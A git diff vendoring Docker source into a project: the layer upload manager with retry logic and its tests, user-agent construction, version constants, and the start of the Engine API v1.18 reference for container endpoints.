+ ID() string + // DiffID should return the DiffID for this layer. + DiffID() layer.DiffID + // Upload is called to perform the Upload. + Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) + // SetRemoteDescriptor provides the distribution.Descriptor that was + // returned by Upload. This descriptor is not to be confused with + // the UploadDescriptor interface, which is used for internally + // identifying layers that are being uploaded. + SetRemoteDescriptor(descriptor distribution.Descriptor) +} + +// Upload is a blocking function which ensures the listed layers are present on +// the remote registry. It uses the string returned by the Key method to +// deduplicate uploads. +func (lum *LayerUploadManager) Upload(ctx context.Context, layers []UploadDescriptor, progressOutput progress.Output) error { + var ( + uploads []*uploadTransfer + dedupDescriptors = make(map[string]*uploadTransfer) + ) + + for _, descriptor := range layers { + progress.Update(progressOutput, descriptor.ID(), "Preparing") + + key := descriptor.Key() + if _, present := dedupDescriptors[key]; present { + continue + } + + xferFunc := lum.makeUploadFunc(descriptor) + upload, watcher := lum.tm.Transfer(descriptor.Key(), xferFunc, progressOutput) + defer upload.Release(watcher) + uploads = append(uploads, upload.(*uploadTransfer)) + dedupDescriptors[key] = upload.(*uploadTransfer) + } + + for _, upload := range uploads { + select { + case <-ctx.Done(): + return ctx.Err() + case <-upload.Transfer.Done(): + if upload.err != nil { + return upload.err + } + } + } + for _, l := range layers { + l.SetRemoteDescriptor(dedupDescriptors[l.Key()].remoteDescriptor) + } + + return nil +} + +func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + u := &uploadTransfer{ + Transfer: NewTransfer(), + } + + go func() { + defer func() 
{ + close(progressChan) + }() + + progressOutput := progress.ChanOutput(progressChan) + + select { + case <-start: + default: + progress.Update(progressOutput, descriptor.ID(), "Waiting") + <-start + } + + retries := 0 + for { + remoteDescriptor, err := descriptor.Upload(u.Transfer.Context(), progressOutput) + if err == nil { + u.remoteDescriptor = remoteDescriptor + break + } + + // If an error was returned because the context + // was cancelled, we shouldn't retry. + select { + case <-u.Transfer.Context().Done(): + u.err = err + return + default: + } + + retries++ + if _, isDNR := err.(DoNotRetry); isDNR || retries == maxUploadAttempts { + logrus.Errorf("Upload failed: %v", err) + u.err = err + return + } + + logrus.Errorf("Upload failed, retrying: %v", err) + delay := retries * 5 + ticker := time.NewTicker(time.Second) + + selectLoop: + for { + progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1]) + select { + case <-ticker.C: + delay-- + if delay == 0 { + ticker.Stop() + break selectLoop + } + case <-u.Transfer.Context().Done(): + ticker.Stop() + u.err = errors.New("upload cancelled during retry delay") + return + } + } + } + }() + + return u + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go new file mode 100644 index 0000000000..16bd187336 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go @@ -0,0 +1,134 @@ +package xfer + +import ( + "errors" + "sync/atomic" + "testing" + "time" + + "github.com/docker/distribution" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxUploadConcurrency = 3 + +type mockUploadDescriptor struct { + currentUploads *int32 + diffID layer.DiffID + simulateRetries int +} + +// Key returns the key used to deduplicate downloads. 
+func (u *mockUploadDescriptor) Key() string { + return u.diffID.String() +} + +// ID returns the ID for display purposes. +func (u *mockUploadDescriptor) ID() string { + return u.diffID.String() +} + +// DiffID should return the DiffID for this layer. +func (u *mockUploadDescriptor) DiffID() layer.DiffID { + return u.diffID +} + +// SetRemoteDescriptor is not used in the mock. +func (u *mockUploadDescriptor) SetRemoteDescriptor(remoteDescriptor distribution.Descriptor) { +} + +// Upload is called to perform the upload. +func (u *mockUploadDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { + if u.currentUploads != nil { + defer atomic.AddInt32(u.currentUploads, -1) + + if atomic.AddInt32(u.currentUploads, 1) > maxUploadConcurrency { + return distribution.Descriptor{}, errors.New("concurrency limit exceeded") + } + } + + // Sleep a bit to simulate a time-consuming upload. + for i := int64(0); i <= 10; i++ { + select { + case <-ctx.Done(): + return distribution.Descriptor{}, ctx.Err() + case <-time.After(10 * time.Millisecond): + progressOutput.WriteProgress(progress.Progress{ID: u.ID(), Current: i, Total: 10}) + } + } + + if u.simulateRetries != 0 { + u.simulateRetries-- + return distribution.Descriptor{}, errors.New("simulating retry") + } + + return distribution.Descriptor{}, nil +} + +func uploadDescriptors(currentUploads *int32) []UploadDescriptor { + return []UploadDescriptor{ + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:1515325234325236634634608943609283523908626098235490238423902343"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:6929356290463485374960346430698374523437683470934634534953453453"), 0}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0}, + 
&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:8159352387436803946235346346368745389534789534897538734598734987"), 1}, + &mockUploadDescriptor{currentUploads, layer.DiffID("sha256:4637863963478346897346987346987346789346789364879364897364987346"), 0}, + } +} + +func TestSuccessfulUpload(t *testing.T) { + lum := NewLayerUploadManager(maxUploadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + var currentUploads int32 + descriptors := uploadDescriptors(¤tUploads) + + err := lum.Upload(context.Background(), descriptors, progress.ChanOutput(progressChan)) + if err != nil { + t.Fatalf("upload error: %v", err) + } + + close(progressChan) + <-progressDone +} + +func TestCancelledUpload(t *testing.T) { + lum := NewLayerUploadManager(maxUploadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + + go func() { + for range progressChan { + } + close(progressDone) + }() + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + <-time.After(time.Millisecond) + cancel() + }() + + descriptors := uploadDescriptors(nil) + err := lum.Upload(ctx, descriptors, progress.ChanOutput(progressChan)) + if err != context.Canceled { + t.Fatal("expected upload to be cancelled") + } + + close(progressChan) + <-progressDone +} diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go new file mode 100644 index 0000000000..d2a891c4d6 --- /dev/null +++ b/vendor/github.com/docker/docker/dockerversion/useragent.go @@ -0,0 +1,74 @@ +package dockerversion + +import ( + "fmt" + "runtime" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/useragent" + 
"golang.org/x/net/context" +) + +// DockerUserAgent is the User-Agent the Docker client uses to identify itself. +// In accordance with RFC 7231 (5.5.3) is of the form: +// [docker client's UA] UpstreamClient([upstream client's UA]) +func DockerUserAgent(ctx context.Context) string { + httpVersion := make([]useragent.VersionInfo, 0, 6) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "docker", Version: Version}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "go", Version: runtime.Version()}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "git-commit", Version: GitCommit}) + if kernelVersion, err := kernel.GetKernelVersion(); err == nil { + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "kernel", Version: kernelVersion.String()}) + } + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "os", Version: runtime.GOOS}) + httpVersion = append(httpVersion, useragent.VersionInfo{Name: "arch", Version: runtime.GOARCH}) + + dockerUA := useragent.AppendVersions("", httpVersion...) 
+ upstreamUA := getUserAgentFromContext(ctx) + if len(upstreamUA) > 0 { + ret := insertUpstreamUserAgent(upstreamUA, dockerUA) + return ret + } + return dockerUA +} + +// getUserAgentFromContext returns the previously saved user-agent context stored in ctx, if one exists +func getUserAgentFromContext(ctx context.Context) string { + var upstreamUA string + if ctx != nil { + var ki interface{} = ctx.Value(httputils.UAStringKey) + if ki != nil { + upstreamUA = ctx.Value(httputils.UAStringKey).(string) + } + } + return upstreamUA +} + +// escapeStr returns s with every rune in charsToEscape escaped by a backslash +func escapeStr(s string, charsToEscape string) string { + var ret string + for _, currRune := range s { + appended := false + for _, escapeableRune := range charsToEscape { + if currRune == escapeableRune { + ret += `\` + string(currRune) + appended = true + break + } + } + if !appended { + ret += string(currRune) + } + } + return ret +} + +// insertUpstreamUserAgent adds the upstream client useragent to create a user-agent +// string of the form: +// $dockerUA UpstreamClient($upstreamUA) +func insertUpstreamUserAgent(upstreamUA string, dockerUA string) string { + charsToEscape := `();\` + upstreamUAEscaped := escapeStr(upstreamUA, charsToEscape) + return fmt.Sprintf("%s UpstreamClient(%s)", dockerUA, upstreamUAEscaped) +} diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go new file mode 100644 index 0000000000..33f77d3ce6 --- /dev/null +++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go @@ -0,0 +1,16 @@ +// +build !autogen + +// Package dockerversion is auto-generated at build-time +package dockerversion + +// Default build-time variable for library-import. +// This file is overridden on build with build-time informations. 
+const ( + GitCommit string = "library-import" + Version string = "library-import" + BuildTime string = "library-import" + IAmStatic string = "library-import" + ContainerdCommitID string = "library-import" + RuncCommitID string = "library-import" + InitCommitID string = "library-import" +) diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md new file mode 100644 index 0000000000..da93093075 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/README.md @@ -0,0 +1,30 @@ +# The non-reference docs have been moved! + + + +The documentation for Docker Engine has been merged into +[the general documentation repo](https://github.com/docker/docker.github.io). + +See the [README](https://github.com/docker/docker.github.io/blob/master/README.md) +for instructions on contributing to and building the documentation. + +If you'd like to edit the current published version of the Engine docs, +do it in the master branch here: +https://github.com/docker/docker.github.io/tree/master/engine + +If you need to document the functionality of an upcoming Engine release, +use the `vnext-engine` branch: +https://github.com/docker/docker.github.io/tree/vnext-engine/engine + +The reference docs have been left in docker/docker (this repo), which remains +the place to edit them. + +The docs in the general repo are open-source and we appreciate +your feedback and pull requests! diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md new file mode 100644 index 0000000000..0db0c0f916 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.18.md @@ -0,0 +1,2156 @@ +--- +title: "Engine API v1.18" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.18/ +- /reference/api/docker_remote_api_v1.18/ +--- + + + +## 1. 
Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST, but for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `STDOUT`, + `STDIN` and `STDERR`. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.18/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. 
+ Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.18/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", 
"other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. 
+- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. 
+  - **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+    Specified as a boolean value.
+  - **Dns** - A list of DNS servers for the container to use.
+  - **DnsSearch** - A list of DNS search domains
+  - **ExtraHosts** - A list of hostnames/IP mappings to add to the
+    container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+  - **VolumesFrom** - A list of volumes to inherit from another container.
+    Specified in the form `[<container name>[:<ro|rw>]]`
+  - **CapAdd** - A list of kernel capabilities to add to the container.
+  - **CapDrop** - A list of kernel capabilities to drop from the container.
+  - **RestartPolicy** – The behavior to apply when the container exits. The
+    value is an object with a `Name` property of either `"always"` to
+    always restart or `"on-failure"` to restart only when the container
+    exit code is non-zero. If `on-failure` is used, `MaximumRetryCount`
+    controls the number of times to retry before giving up.
+    The default is not to restart. (optional)
+    An ever increasing delay (double the previous delay, starting at 100mS)
+    is added before each restart to prevent flooding the server.
+  - **NetworkMode** - Sets the networking mode for the container. Supported
+    values are: `bridge`, `host`, `none`, and `container:<name|id>`
+  - **Devices** - A list of devices to add to the container specified as a JSON object in the
+    form
+    `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+  - **Ulimits** - A list of ulimits to set in the container, specified as
+    `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+    `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+  - **SecurityOpt**: A list of string values to customize labels for MLS
+    systems, such as SELinux.
+  - **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+    `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+    Available types: `json-file`, `syslog`, `journald`, `none`.
+    `json-file` logging driver.
+ - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "PortSpecs": null, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpuShares": 0, + "Devices": [], + "Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + 
"NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Volumes": {}, + "VolumesRW": {} + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. 
+ +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. 
+- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
+ +**Example request**: + + GET /v1.18/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 16970827, + 1839451, + 7107380, + 10571290 + ], + "usage_in_usermode" : 10000000, + "total_usage" : 36488948, + "usage_in_kernelmode" : 20000000 + }, + "system_cpu_usage" : 20091722000000000, + "throttling_data" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize?h=&w=` + +Resize the TTY for container with `id`. You must restart the container for the resize to take effect. 
+ +**Example request**: + + POST /v1.18/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.18/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/kill HTTP/1.1 + 
